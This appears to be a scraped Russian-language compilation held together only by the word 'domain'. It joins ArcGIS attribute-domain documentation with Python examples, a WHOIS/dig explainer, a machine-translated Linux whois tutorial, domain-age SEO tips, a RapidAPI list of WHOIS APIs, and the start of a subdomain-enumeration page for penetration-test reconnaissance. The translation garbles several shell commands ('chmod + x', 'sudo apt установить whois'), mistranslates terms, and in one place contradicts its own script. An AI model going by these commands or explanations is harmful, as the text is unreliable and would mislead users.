    2. Добавить значения или установить диапазон значений с помощью инструмента Добавить кодированное значение к домену или инструмента Установить значение для интервального домена.
    3. Связать домен с классом пространственных объектов, используя этот инструмент.
  • Если атрибутивный домен связан с таблицей или классом пространственных объектов, в базе данных создается правило проверки атрибутов. Это правило проверки атрибутов описывает и ограничивает корректные значения для поля соответствующего типа.

  • Один атрибутивный домен может быть связан с несколькими полями в одной таблице, классе пространственных объектов или подтипе, а также в нескольких таблицах и классах пространственных объектов.

  • Для определения параметра Входная таблица можно использовать слои пространственных объектов или представления таблиц.

  • Доменами рабочих областей можно также управлять в ArcCatalog или в окне Каталога. Домены можно создать и изменить на вкладке Домены (Domains) диалогового окна Свойства базы данных (Database Properties).

  • В параметре Подтип кнопка Добавить значение используется только в ModelBuilder. В ModelBuilder, если предыдущий инструмент не был запущен или не существует его производных данных, параметр Подтип может не быть заполнен значениями. Кнопка Добавить значение позволяет добавлять нужные значения, таким образом вы можете завершить диалог Назначить домен полю и продолжить построение модели.

Синтаксис

AssignDomainToField_management (in_table, field_name, domain_name, {subtype_code})

Пример кода

Назначить домен полю. Пример (окно Python)

Пример скрипта Python для выполнения функции AssignDomainToField с запуском из окна Python в ArcGIS.

import arcpy
from arcpy import env
env.workspace = "C:/data"
arcpy.AssignDomainToField_management("montgomery.gdb/Landbase/Parcels", "ZONING_S", "ZoningFields", "1: government")
AssignDomaintoField, пример 2 (автономный скрипт)

Следующий скрипт применяет функцию AssignDomainToField как часть рабочего процесса создания атрибутивного домена, назначения значений в домен и присваивания домена полю

# Name: MakeDomain.py
# Description: Create an attribute domain to constrain pipe material values
 
#Import system modules
import arcpy
 
try:
    # Set the workspace (to avoid having to type in the full path to the data every time)
    arcpy.env.workspace = "C:/data"
 
    # Set local parameters
    domName = "Material4"
    gdb = "montgomery.gdb"
    inFeatures = "Montgomery.gdb/Water/Distribmains"
    inField = "Material"
 
    # Process: Create the coded value domain
    arcpy.CreateDomain_management("montgomery.gdb", domName, "Valid pipe materials", "TEXT", "CODED")
    
    #Store all the domain values in a dictionary with the domain code as the "key" and the 
    #domain description as the "value" (domDict[code])
    domDict = {"CI":"Cast iron", "DI": "Ductile iron", "PVC": "PVC", 
               "ACP": "Asbestos concrete", "COP": "Copper"}
    
    # Process: Add valid material types to the domain
    #use a for loop to cycle through all the domain codes in the dictionary
    for code in domDict:        
        arcpy.AddCodedValueToDomain_management(gdb, domName, code, domDict[code])
    
    # Process: Constrain the material value of distribution mains
    arcpy.AssignDomainToField_management(inFeatures, inField, domName)
 
except Exception as err:
    print(err.args[0])

Параметры среды

Связанные темы

Отзыв по этому разделу?

Проверка работы домена и его записей — База знаний

Для проверки работы домена и его записей пользуются:

1) WHOIS (от англ. who is — «кто это?») сетевой протокол прикладного уровня, базирующийся на протоколе TCP (порт 43). Основное применение — получение регистрационных данных о владельцах доменных имён, IP-адресов и автономных систем.

Протокол подразумевает архитектуру «клиент-сервер» и используется для доступа к публичным серверам баз данных (БД) регистраторов IP-адресов и регистраторов доменных имён. Текущая версия этого протокола описана в RFC 3912. Чаще всего WHOIS-клиенты реализованы в виде консольных программ. Однако, поскольку для многих пользователей командная строка недоступна или неудобна, на основе консольных клиентов обычно создаются веб-формы, доступные пользователям на многих сайтах в Интернете. Кроме того, существуют WHOIS-клиенты и с графическим интерфейсом.

Изначально целью появления системы WHOIS на свет было дать возможность системным администраторам искать контактную информацию других администраторов IP-адресов или доменных имён (аналогично «Белым страницам», «white pages»).


2) IP Lookup — просмотр информации об ip-адресе и подсетях IP Lookup (от англ. Look up) — сервис, с помощью которого можно получить информацию о конкретном ip-адресе: какой организации он принадлежит, каким диапазоном ip-адресов владеет эта организация. Также данный сервис позволяет получать данные о принадлежности подсетей классов B и C, узнать кто является администратором сетей класса А. Используя Lookup вы сможете определить хостинг-площадку на которой размещет интересующий вас веб-сайт.


3) dig — утилита, предоставляющая пользователю интерфейс командной строки для обращения к системе DNS. Позволяет задавать различные типы запросов и запрашивать произвольно указываемые сервера.


Воспользоваться сервисами и утилитами довольно просто. Переходите на нужный ресурс и вводите свой домен/IP адрес, жмёте кнопку и Вам показывает всю полученную информацию.

Проверка домена adminvps.ru на примере whois сервиса от xseo


Полезные ссылки

DIG утилиты

https://toolbox.googleapps.com/apps/dig/

https://dnschecker.org/

https://xseo.in/dig

Whois сервисы

https://xseo.in/whois

HTTP! http://www.whois-service.ru/

IP Lookup сервисы

https://whatismyipaddress.com/ip-lookup

https://www.ultratools.com/tools/ipWhoisLookupResult

 


Подробное описание каждой строки ответа на запрос whois:

Поле

Описание

address: контактный адрес физического лица (на английском языке)
(необязательное)
admin-c: идентификатор представителя организации для административного контакта с РосНИИРОС
admin-o: идентификатор администратора домена
bill-c: идентификатор представителя организации, ответственного за оплату услуг по домену
changed: дата последнего изменения клиентом информации в объекте (приводит к запуску процесса тестирования зоны). Для доменов третьего уровня может указывать дату, когда начнется ежегодное автоматическое тестирование зоны, если не будет прислан запрос на обновление зоны
[в формате YYYY.MM.DD, где YYYY — год, MM — месяц, DD — число]
created: дата регистрации домена; не изменяется при продлении срока регистрации, смене администратора или регистратора домена
[в формате YYYY.MM.DD, где YYYY — год, MM — месяц, DD — число]
domain: доменное имя
e-mail: адрес электронной почты
fax-no: номер факса (с международным кодом и кодом города)
free-date: дата освобождения домена (указывается для доменов с приближающимся сроком аннулирования регистрации)
[в формате YYYY.MM.DD, где YYYY — год, MM — месяц, DD — число]
mnt-adm: организация или физическое лицо, которому принадлежит служба технической поддержки
mnt-by: идентификатор службы технической поддержки (службы авторизации), отвечающей за корректность информации о домене в базе данных РосНИИРОС
mntner: идентификатор службы технической поддержки в базе данных РосНИИРОС
nic-hdl: идентификатор объекта базы данных
nserver: список DNS-серверов, поддерживающих домен (если имя сервера содержит имя домена, то указываются также его IP-адреса)
org: название организации
paid-till: дата, по которую оплачена регистрация домена
[в формате YYYY.MM.DD, где YYYY — год, MM — месяц, DD — число]
person: полное имя физического лица
phone: телефон(ы) с международным кодом и кодом города
reg-ch: идентификатор регистратора, которому передается домен
(если должен смениться регистратор)
registrar: идентификатор регистратора
remark: произвольные текстовые комментарии (поле необязательное)
source: источник информации
state: состояние объекта
tech-c: идентификатор контактного лица по техническим вопросам
type: тип домена
whois: Whois-сервис регистратора
www: URL-адрес сайта регистратора
x-freeing: домен подлежит удалению из реестра в течение часа

Whois в Linux: как узнать информацию о домене

Поиск в Whois расскажет вам много информации о том, кто владеет интернет-доменом. В Linux вы можете запустить поиск whois из командной строки. Мы проведем вас через это.

Система Whois

Система whois представляет собой список записей, которые содержат сведения как о владельцах доменов, так и о владельцах. Интернет-корпорация по присвоению имен и номеров  (ICANN) регулирует регистрацию доменного имени и право собственности, но список записей проводится многими компаниями, известными как реестры.

Любой может запросить список записей. Когда вы это сделаете, один из реестров обработает ваш запрос и отправит вам данные из соответствующей записи whois.

Прежде чем идти дальше, важно, чтобы вы ознакомились со следующими терминами:

  • Реестр: компания, которая управляет списком, содержащим набор доменных имен (их много).
  • Регистрант: законный владелец домена; это зарегистрировано для этого человека.
  • Регистратор. Регистрант использует регистратора для своей регистрации.

Запись Whois содержит всю контактную информацию, связанную с лицом, компанией или другим лицом, зарегистрировавшим доменное имя. Некоторые регистрации содержат больше информации, чем другие, а некоторые реестры возвращают различное количество информации.

Типичная запись whois будет содержать следующую информацию:

  • The name and contact information of the registrant: владелец домена.
  • The name and contact information of the registrar: организация, которая зарегистрировала доменное имя.
  • The registration date: дата регистрации домена.
  • When the information was last updated: дата последнего обновления информации о домене.
  • The expiration date: дата освобождения домена.

Вы можете делать запросы whois в Интернете, но с помощью whoisкоманды Linux вы можете выполнять поиск прямо из командной строки. Это полезно, если вам нужно выполнить поиск с компьютера без графического интерфейса пользователя или если вы хотите сделать это из сценария оболочки.

Установка Whois

Команда whoisуже была установлена ​​в Ubuntu 20.04. Если вам нужно установить его в вашей версии Ubuntu, вы можете сделать это с помощью следующей команды:

sudo apt-get install whois

На Fedora используйте команду ниже:

sudo dnf install whois

И, наконец, на Манджаро введите следующее:

sudo pacman -Syu whois

Использование whois с доменным именем

Вы можете использовать whoisкоманду с доменными именами или  Internet Protocol (IP) адреса. Для каждого из них возвращается немного другой набор информации.

Мы будем использовать доменное имя для нашего первого примера:

whois cnn.com

Ответ из реестра whois начинается со сводки, а затем повторяется с добавлением дополнительной информации. Ниже приведен пример с удаленными заявлениями о товарных знаках и условиями использования:

Domain Name: CNN.COM
Registry Domain ID: 3269879_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
Updated Date: 2018-04-10T16:43:38Z
Creation Date: 1993-09-22T04:00:00Z
Registry Expiry Date: 2026-09-21T04:00:00Z
Registrar: CSC Corporate Domains, Inc.
Registrar IANA ID: 299
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: 8887802723
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-1630.AWSDNS-11.CO.UK
Name Server: NS-47.AWSDNS-05.COM
Name Server: NS-576.AWSDNS-08.NET
DNSSEC: unsigned

Это достаточно понятно. Мы видим различные сведения о регистраторе и реестре, в том числе контактные данные, даты регистрации и т. Д. В списке есть несколько записей, которые вы можете не распознать.

Управление по присвоению номеров в Интернете (IANA) контролирует и координирует такие вещи, как зоны системы доменных имен верхнего уровня, системы адресации по протоколу IP и список реестров. Этот реестр имеет номер 299, который указан в списке как «IANA ID: 299.»

Строки «Статус домена» показывают состояние, в котором находится домен, и он может быть в нескольких одновременно. Состояния определены в расширяемом протоколе обеспечения. Некоторые из них встречаются редко, а другие ограничены определенными ситуациями, такими как правовые споры.

Следующие государства прикреплены к этой регистрации:

  • clientTransferProhibited: Реестр домена будет отклонять запросы на передачу домена от текущего регистратора к другому.
  • serverDeleteProhibited: домен не может быть удален.
  • serverTransferProhibited: домен не может быть передан другому регистратору.
  • serverUpdateProhibited: домен не может быть обновлен

Последние три обычно активируются по запросу владельца регистрации или в случае судебного разбирательства. В этом случае CNN, вероятно, потребовал, чтобы они были принудительно «заблокированы» доменом компании.

«DNSSEC» означает «Расширения безопасности системы доменных имен» , схему, которая позволяет распознавателю DNS-имен криптографически проверять, что данные, полученные из зоны DNS, действительны и не были подделаны.

Более длинная часть ответа показана ниже:

Domain Name: cnn.com
Registry Domain ID: 3269879_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: www.cscprotectsbrands.com
Updated Date: 2018-04-10T16:43:38Z
Creation Date: 1993-09-22T04:00:00Z
Registrar Registration Expiration Date: 2026-09-21T04:00:00Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar IANA ID: 299
Registrar Abuse Contact Email: [email protected]
Registrar Abuse Contact Phone: +1.8887802723
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited
Registry Registrant ID:
Registrant Name: Domain Name Manager
Registrant Organization: Turner Broadcasting System, Inc.
Registrant Street: One CNN Center
Registrant City: Atlanta
Registrant State/Province: GA
Registrant Postal Code: 30303
Registrant Country: US
Registrant Phone: +1.4048275000
Registrant Phone Ext:
Registrant Fax: +1.4048271995
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:
Admin Name: Domain Name Manager
Admin Organization: Turner Broadcasting System, Inc.
Admin Street: One CNN Center
Admin City: Atlanta
Admin State/Province: GA
Admin Postal Code: 30303
Admin Country: US
Admin Phone: +1.4048275000
Admin Phone Ext:
Admin Fax: +1.4048271995
Admin Fax Ext:
Admin Email: [email protected]
Registry Tech ID:
Tech Name: TBS Server Operations
Tech Organization: Turner Broadcasting System, Inc.
Tech Street: One CNN Center
Tech City: Atlanta
Tech State/Province: GA
Tech Postal Code: 30303
Tech Country: US
Tech Phone: +1.4048275000
Tech Phone Ext:
Tech Fax: +1.4048271593
Tech Fax Ext:
Tech Email: [email protected]
Name Server: ns-576.awsdns-08.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-47.awsdns-05.com
Name Server: ns-1630.awsdns-11.co.uk
DNSSEC: unsigned

Это дает нам более или менее ту же информацию, что и резюме, с дополнительными разделами о регистранте и его контактных данных для административных и технических целей.

Имя регистранта называется «Менеджер доменных имен». Иногда за определенную плату компании предпочитают, чтобы их регистратор регистрировал домен от своего имени под общим именем, которое регистратор поддерживает для этой цели. Это, кажется, имеет место здесь. Однако, поскольку адрес регистранта — «1 Центр CCN», очевидно, кто является регистрантом.

Использование whois с IP-адресом

Использовать  whoisс IP-адресом так же просто, как использовать его с доменным именем. Просто укажите IP-адрес после whois, вот так:

whois 205.251.242.103

Это результат, возвращаемый whois:

NetRange: 205.251.192.0 - 205.251.255.255
CIDR: 205.251.192.0/18
NetName: AMAZON-05
NetHandle: NET-205-251-192-0-1
Parent: NET205 (NET-205-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS16509, AS39111, AS7224
Organization: Amazon.com, Inc. (AMAZON-4)
RegDate: 2010-08-27
Updated: 2015-09-24
Ref: https://rdap.arin.net/registry/ip/205.251.192.0

OrgName: Amazon.com, Inc.
OrgId: AMAZON-4
Address: 1918 8th Ave
City: SEATTLE
StateProv: WA
PostalCode: 98101-1244
Country: US
RegDate: 1995-01-23
Updated: 2020-03-31
Ref: https://rdap.arin.net/registry/entity/AMAZON-4

OrgAbuseHandle: AEA8-ARIN
OrgAbuseName: Amazon EC2 Abuse
OrgAbusePhone: +1-206-266-4064 
OrgAbuseEmail: [email protected]
OrgAbuseRef: https://rdap.arin.net/registry/entity/AEA8-ARIN

OrgNOCHandle: AANO1-ARIN
OrgNOCName: Amazon AWS Network Operations
OrgNOCPhone: +1-206-266-4064 
OrgNOCEmail: [email protected]
OrgNOCRef: https://rdap.arin.net/registry/entity/AANO1-ARIN

OrgRoutingHandle: ADR29-ARIN
OrgRoutingName: AWS Dogfish Routing
OrgRoutingPhone: +1-206-266-4064 
OrgRoutingEmail: [email protected]
OrgRoutingRef: https://rdap.arin.net/registry/entity/ADR29-ARIN

OrgRoutingHandle: IPROU3-ARIN
OrgRoutingName: IP Routing
OrgRoutingPhone: +1-206-266-4064 
OrgRoutingEmail: [email protected]
OrgRoutingRef: https://rdap.arin.net/registry/entity/IPROU3-ARIN

OrgTechHandle: ANO24-ARIN
OrgTechName: Amazon EC2 Network Operations
OrgTechPhone: +1-206-266-4064 
OrgTechEmail: [email protected]
OrgTechRef: https://rdap.arin.net/registry/entity/ANO24-ARIN

RTechHandle: ROLEA19-ARIN
RTechName: Role Account
RTechPhone: +1-206-266-4064 
RTechEmail: [email protected]
RTechRef: https://rdap.arin.net/registry/entity/ROLEA19-ARIN

RAbuseHandle: ROLEA19-ARIN
RAbuseName: Role Account
RAbusePhone: +1-206-266-4064 
RAbuseEmail: [email protected]
RAbuseRef: https://rdap.arin.net/registry/entity/ROLEA19-ARIN

RNOCHandle: ROLEA19-ARIN
RNOCName: Role Account
RNOCPhone: +1-206-266-4064 
RNOCEmail: [email protected]
RNOCRef: https://rdap.arin.net/registry/entity/ROLEA19-ARIN

Первый раздел содержит информацию об организации, которой принадлежит искомый IP-адрес (в данном случае один из многих, принадлежащих Amazon). Мы также получили некоторые идентификаторы, используемые для внутренней идентификации Amazon.com, Inc. в реестре.

Второй раздел содержит адрес и имя владельца регистрации, Amazon.com, Inc. Веб-адрес в поле «Ref:» содержит эту информацию в формате JavaScript Object Notation (JSON).

Другие разделы содержат контактную информацию, которая позволяет сообщать о проблемах, связанных со злоупотреблениями, работой сети, маршрутизацией трафика и т. Д.

Использование whois в скрипте

Чтобы использовать whois в скрипте, давайте предположим, что у нас есть набор доменов, для которых нам нужно проверить даты истечения срока действия. Мы можем сделать это с помощью небольшого сценария оболочки.

Введите это в редактор и сохраните как «get-expiry.sh»:

#!/bin/bash

DOMAIN_LIST="howtogeek.com reviewgeek.com lifesavvy.com cloudsavvyit.com"

echo "Expiration dates:"

for domain in $DOMAIN_LIST
do
  echo -n "$domain :: "
  whois $domain | grep 'Expiration' | awk '{print $5}'
done

Установите для сценария разрешения на выполнение с помощью chmodкоманды, как показано ниже:

chmod + x get-expiry.sh

Запустите скрипт, назвав его по имени:

./get-expiry.sh

Срок годности для каждого домена извлекается из ответа из whoisиспользуя grepдля поиска строк , которые содержат строку «Действительно,» и используя awk для печати пятого элемента из этой строки.

Удобство и автоматизация

Да, вы также можете выполнять поиск в Интернете. Однако наличие whoisкоманды в окне терминала и сценариях обеспечивает удобство, гибкость и дает возможность автоматизировать некоторые из ваших рабочих нагрузок.

Статьи по теме:

Что такое возраст домена, как его смотреть. Список сервисов проверки WHOIS

Возраст домена — это дата регистрации домена, определяется в с помощью системной информации которая храниться в «паспорте» домена WHOIS.

У большинства доменов информация WHOIS открыта и ее можно смотреть с помощью WHOIS сервисов.

Важно! Не стоит путать возраст домена по WHOIS с его историей которую можно изучить с помощью сервиса Web Archive

Что такое возраст сайта и как его определить?

Важно понимать, что есть возраст сайта и .  возраст домена. Возраст сайта — это возраст страниц которые продвигаются, а возраст домена это дата регистрации доменного имени у регистратора.

  • можно с помощью онлайн сервисов
  • с помощью проверки сервиса просмотра whois

Как узнать возраст домена

Проверить возраст домена просто, нужно узнать дату его регистрации, строка create в WHOIS

  1. находим сервис WHOIS в Google — например сервисы: imena, reg.ru
  2. вводим имя домена, без https и www, просто домен, например imt-academy.com
  3. в паспорте находим строку которая связана с create, created, creation…
    самая первая, которая связана с доменом, а не регистратором.

Возраст в паспорте домена по Whois

В данных, которые выдает whois, показывает много системной информации, необходимо найти то, что будет указывать на дату регистрации домена.

чаще всего за это отвечает строка create — это и будет датой регистрации домена

удобно отображается в этом сервисе по блокам информация о домене, регистраторе и владельце сайта

https://www.whois.com/whois/imt.academy

Возраст домена для SEO

Один из показателей TRUST’а домена. Показатель, который невозможно накрутить, в отличии от ссылочной массы, поведенческого фактора и других показателей.

Как найти подробную информацию о домене с помощью команды whois? – ПОФТУТ

whois   очень популярный и полезный инструмент, используемый для составления списка и поиска информации о домене. Как правило, мы знаем, что домен и поддомены разрешаются в IP-адрес, и наш браузер перенаправляет на этот IP-адрес. Но реальная история не только в этом. Доменные имена имеют множество атрибутов, которые состоят из следующих разделов.

  • Регистрант
  • Администратор
  • Тех.
  • Сервер имен

Теперь мы начнем с установки команды who   в дистрибутивы на основе apt, такие как Ubuntu, Debian, Mint и Kali и т. д.Эта команда будет работать и с другими дистрибутивами на основе apt.

 $ sudo apt установить whois 
Установить для Ubuntu, Debian, Mint, Kali

Мы также можем установить командные дистрибутивы whois , такие как Fedora, CentOS, RHEL. В этом случае мы будем использовать yum .

 $ sudo yum установить whois 

Использование по умолчанию команды whois предоставит всю связанную информацию, которая заполнит наш терминал. В нем будут перечислены все предоставленные категории информации, которые перечислены в разделе введения.В этом примере мы предоставим доменное имя poftut.com .

 $ whois poftut.com 
Получить подробную информацию

Доменное имя   информация предоставит полное доменное имя, которое зарегистрировано и запрошено.

Регистратор   информацию предоставит компания, в которой зарегистрирован этот домен. Эта компания, как правило, предоставляет некоторый инструмент и интерфейс для управления нашим доменным именем.

Whois Server информация будет печатать сервер, который ответил на этот запрос whois .

Сервер имен  предоставит сервер имен запрошенного доменного имени. Серверы имен используются для запроса информации, связанной с доменом, такой как DNS, TXT и другие службы.

Дата обновления  будет указано время последнего изменения этого домена, что является операцией продления срока действия домена.

Дата создания  отображает информацию при первом создании домена.

Expire Date  будет указан срок действия этого домена, и его можно будет купить бесплатно.

Контакт В строке будет указана контактная информация владельца домена.

Топ-10 лучших API WHOIS и API поиска доменов [2021] Более 40 проверенных

Как бы вы хотели узнать записи о владении доменным именем или IP-адресом за считанные секунды? API Whois делает именно это.

API Whois предоставляет запись о владении доменным именем или IP-адресом с деловыми и техническими контактными данными, запрашивая базу данных Whois.

хороший Whois API оптимизирован для быстрого реагирования и может обрабатывать множество параллельных запросов, идеально подходит, если вы используете приложение, которое требует регулярного обновления информации о доменах или имеет длинный список доменов, которые необходимо обрабатывать.

Выбор правильного API Whois для вашего приложения может быть трудным и трудоемким. Мы упростили для вас этот процесс, оценив более сорока API-сервисов Whois.

Критерии выбора API различаются в зависимости от того, что вы хотите с ним делать, поэтому мы оценили многие из них. Некоторые соображения, включенные в наш тест:

  • Функции API: Мы рассмотрели ключевые функции каждого API.
  • Цена: Мы рассмотрели стоимость использования каждого из API, предоставляемых на платформе Rakuten RapidAPI, которая является крупнейшим рынком API в мире.
  • Простота использования: Мы тщательно изучили простоту интеграции каждого API в приложения.

В итоге мы составили следующий список из 10 лучших API поиска доменов и WHOIS:

10 лучших API WHOIS

 

TL;DR: Вот таблица, обобщающая наши основные выводы.

API Функции API Цены Простота использования
API поиска Whois Получить данные в формате JSON или XML Бесплатные и платные планы по 8 или 15 долларов в месяц Легкий
API NetTools Запрос данных WHOIS, разрешение IP-адреса, разрешение имени хоста, получение информации о местоположении Бесплатные и платные планы по 10 или 50 долларов в месяц Легкий
Массовый API WHOIS Получение данных с помощью параметра запроса одного домена или параметров запроса нескольких доменов Бесплатный и платный план за 2 доллара в месяц Легкий
Массовый API данных Whois Выполнять запросы к данным WHOIS большого объема и получать результаты в формате JSON Бесплатные и различные платные планы от 14 долларов.от 99 до 149,99 долларов в месяц Легкий
API домена.io Проверить доступность домена, получить информацию о домене. Бесплатные и различные платные планы от 8 до 200 долларов в месяц Легкий
Имя Набор инструментов API Получить предложения по доменным именам, сведения о регистрации, данные WHOIS Бесплатные и различные платные планы от 5 до 150 долларов в месяц Легкий
API Whois Проверка регистрации доменных имен, доступности домена, обнаружение мошенничества с кредитными картами, географическое расположение пользователей Бесплатно Легкий
JSON Whois — API скриншотов

Создание снимков экрана домена, получение социальных данных, создание графиков, получение информации, связанной с доменом.

Бесплатно Легкий
API WHOIS v2 Запрашивать записи WHOIS, отслеживать регистрации, определять местонахождение пользователей, обнаруживать мошеннические действия Бесплатно Легкий
API доступности домена Проверить наличие доменного имени для регистрации Бесплатно Легкий

Whois API — это простой API, который позволяет быстро и легко искать данные WHOIS.

Возможности API: С API поиска Whois вам просто нужно указать доменное имя и получить обратно данные. Он возвращает контактную информацию владельца доменного имени, статус доступности, дату создания и истечения срока действия, данные сервера имен, данные регистратора и многое другое. API выводит данные в формате JSON или XML. API также поддерживает широкий спектр RIR (региональные интернет-реестры) и TLD (домены верхнего уровня).

Цена: Если вы делаете менее 1000 запросов в месяц, вы можете использовать API бесплатно.В противном случае вы можете заплатить 8 долларов в месяц и получить 15 000 запросов или 15 долларов в месяц и получить неограниченное количество запросов.

Простота использования: Легко следовать документации, чтобы начать работу с API как можно более безупречно.

API NetTools — это набор инструментов, которые позволяют вам получать полезную информацию о ваших клиентах.

Возможности API: API NetTools позволяет запрашивать базу данных WHOIS по IP-адресу, AS или доменному имени, разрешать IP-адрес в DNS, связанный с хостом, разрешать имя хоста, связанное с IP-записью, и получать местоположение информацию путем разрешения записи DNS или общедоступного IP-адреса.

Цена: Вы можете использовать API бесплатно, если вы делаете менее 100 запросов в день. В противном случае вы можете платить 10 долларов в месяц и делать 10 000 запросов или платить 50 долларов в месяц и делать неограниченное количество запросов.

Простота использования: Имеется простая документация, которая поможет вам с легкостью освоить API.

Массовый API WHOIS предоставляет вам эффективный способ сбора данных WHOIS и определения статуса интернет-ресурса.

Функции API Массовый API WHOIS запрашивает базу данных WHOIS в двух режимах: вариант запроса с одним доменом, оптимизированный для задержки, и вариант запроса с несколькими доменами, оптимизированный для пропускной способности. С помощью API вы можете получить дату создания и истечения срока действия доменов, сведения о регистраторе, статус домена и другую информацию WHOIS. Он также поддерживает все TLD.

Цена: Вы можете сделать до 43 200 запросов в день бесплатно, но каждый запрос ограничен 15 доменами.Если вы платите 2 доллара в месяц, вы можете делать до 86 4000 запросов в день и запрашивать 25 доменов за запрос.

Простота использования: Подробная документация и примеры кода на различных языках программирования помогут вам приступить к работе в течение нескольких минут.

Массовый API данных Whois позволяет вам выполнять большие объемы запросов к информации WHOIS и получать данные, которые вы хотите внедрить в своем сценарии использования.

Возможности API: Массовый API данных Whois предоставляет надежные проанализированные данные WHOIS в формате JSON.После указания домена или IP-адреса вы можете получить его данные WHOIS и использовать эти данные в своем приложении. Вы можете выполнять сотни или тысячи запросов WHOIS каждый день. API также поддерживает все TLD, включая новые gTLD.

Цена: Бесплатная версия позволяет делать 100 запросов в месяц. Помимо бесплатного плана, вы можете подписаться на любой из его платных планов, стоимость которых варьируется от 14,99 до 149,99 долларов в месяц.

Простота использования: Всего несколько строк кода, и вы можете приступить к интеграции API просто и без проблем.

API Domaination.io — это простой API, который можно использовать для проверки доступности доменного имени, а также для получения других данных.

Возможности API: С помощью API Domaination.io вы можете получить много информации об указанном домене, включая доступность для регистрации, дату создания, срок действия, класс домена, статус, сведения о регистраторе и многое другое. Он также поддерживает широкий спектр TLD.

Цена: С помощью API можно делать 10 000 бесплатных запросов в месяц.Чтобы получить доступ к более высоким лимитам запросов, вы можете выбрать любой из его платных планов, которые начинаются с 8,00 долларов в месяц до 200,00 долларов в месяц.

Простота использования: Подробная документация поможет вам начать работу с API в течение нескольких минут.

API Name Toolkit позволяет пользователям надежно и быстро получать предложения по доменам, информацию о регистрации и другую информацию WHOIS.

Возможности API: С помощью API Name Toolkit вы можете запрашивать широкий спектр информации о домене, включая рейтинг Alexa, сведения о поиске серверов имен на DNS-серверах и данные WHOIS.Он также поддерживает широкий спектр TLD.

Цена: Если вы совершаете менее 1000 звонков в месяц, вы можете использовать API бесплатно. Помимо бесплатного плана, платные планы варьируются от 5 до 150 долларов в месяц.

Простота использования: Начать работу с API очень просто — существуют примеры интеграции на различных языках программирования, которые вы можете изменить в соответствии со своим вариантом использования.

API Whois позволяет получать полные данные WHOIS об интернет-ресурсах и интегрировать их в свое приложение.

Возможности API: С помощью Whois API вы можете проверять регистрацию доменов, оценивать доступность доменных имен, выявлять мошенничество с кредитными картами, определять географическое местоположение пользователей и многое другое. Он ищет данные только у лучших регистраторов WHOI с полными данными. API также может решить проблемы, связанные с брандмауэром, которые препятствуют доступу к данным WHOIS. Он возвращает данные в формате XML или JSON.

Цена: API предоставляется бесплатно.

Простота использования: Имеется простая документация, которая поможет вам с легкостью использовать API.

JSON Whois — API снимков экрана позволяет создавать снимки экрана домена и получать широкий спектр актуальных данных WHOIS.

Возможности API: С помощью API JSON Whois — Screenshot вы можете сделать снимок экрана домена, который вы можете отобразить в виде миниатюры или как есть. Он предоставляет различные типы социальных данных, такие как количество Google, Twitter и Facebook. Кроме того, API позволяет создавать графики, получать информацию о рейтинге домена Alexa и получать другую важную информацию WHOIS.

Цена: Доступен бесплатно.

Простота использования: Имеются образцы кода, образцы ответов от конечных точек и другие ссылки, облегчающие использование API.

API WHOIS v2 обладает отличными функциями для запроса записей WHOIS о доменных именах, IP-адресах и других онлайн-ресурсах.

Возможности API: API WHOIS v2 позволяет отслеживать регистрацию доменных имен, оценивать доступность домена и определять географическое местоположение пользователей.С помощью API вы можете получить адрес регистрации, информацию о регистраторе, дату создания, срок действия, дату обновления и другую информацию. Его можно использовать для расследования и предотвращения киберпреступлений, выявления мошеннических действий и проведения анализа конкурентов. Данные возвращаются в хорошо проанализированном формате XML или JSON.

Цена: Предоставляется бесплатно.

Простота использования: Имеются примеры использования популярных языков программирования, подробная документация и поддержка, которые помогут вам преодолеть любые препятствия при внедрении API.

API доступности домена позволяет проверить, доступен ли домен для регистрации.

Функции API: С помощью API доступности домена вы можете точно определить доступность доменного имени для регистрации. Он возвращает статус доступности как с проанализированными полями, так и с необработанными текстами в форматах JSON и XML. API поддерживает все домены верхнего уровня. Кроме того, он постоянно обновляется, чтобы пользователи всегда получали актуальную информацию.

Цена: Это бесплатный API WHOIS.

Простота использования: Имеется простая документация, гарантирующая, что вы используете API без каких-либо проблем с программированием.

Заключение

Это список 10 лучших API для поиска доменов и WHOIS от Rakuten RapidAPI. Мы надеемся, что вы найдете подходящий API для интеграции информации о домене и WHOIS в свое приложение.

Всего наилучшего!

О Rakuten RapidAPI:

Rakuten RapidAPI — крупнейший в мире рынок API с более чем 8 000 сторонних API, которым пользуются более 500 000 активных разработчиков.Мы позволяем разработчикам создавать преобразующие приложения с помощью мощных API. Найдите, протестируйте и подключитесь ко всем необходимым API в одном месте!

Ознакомьтесь с некоторыми из лучших в мире API, включая Microsoft, Sendgrid, Crunchbase и Skyscanner.

Facebook | LinkedIn | Твиттер

Бесплатный онлайн-поиск поддоменов 🛡️ поиск поддоменов домена

Поиск поддоменов является важным шагом на этапе сбора информации при тестировании на проникновение. Субдомены интересны тем, что они указывают на различные (менее известные) приложения и указывают на разные диапазоны внешней сети, используемые целевой компанией.

Например, subdom1.company.com указывает на IP 1.1.1.1 и subdom2.company.com указывает на IP 2.2.2.2 . Теперь вы знаете два разных диапазона IP-адресов, которые, возможно, принадлежат вашей целевой организации, и вы можете расширить поверхность атаки.

Кроме того, на поддоменах иногда размещаются «непубличные» приложения (например, тестовые, разрабатываемые, с ограниченным доступом), которые обычно менее безопасны, чем общедоступные/официальные приложения, поэтому они могут быть основными целями атаки.

Параметры

Параметр Описание
Доменное имя Целевое доменное имя (например, .
Включить информацию об IP Этот параметр указывает инструменту выполнять запросы whois, чтобы определить владельцев сети и страну для каждого IP-адреса.

Как это работает

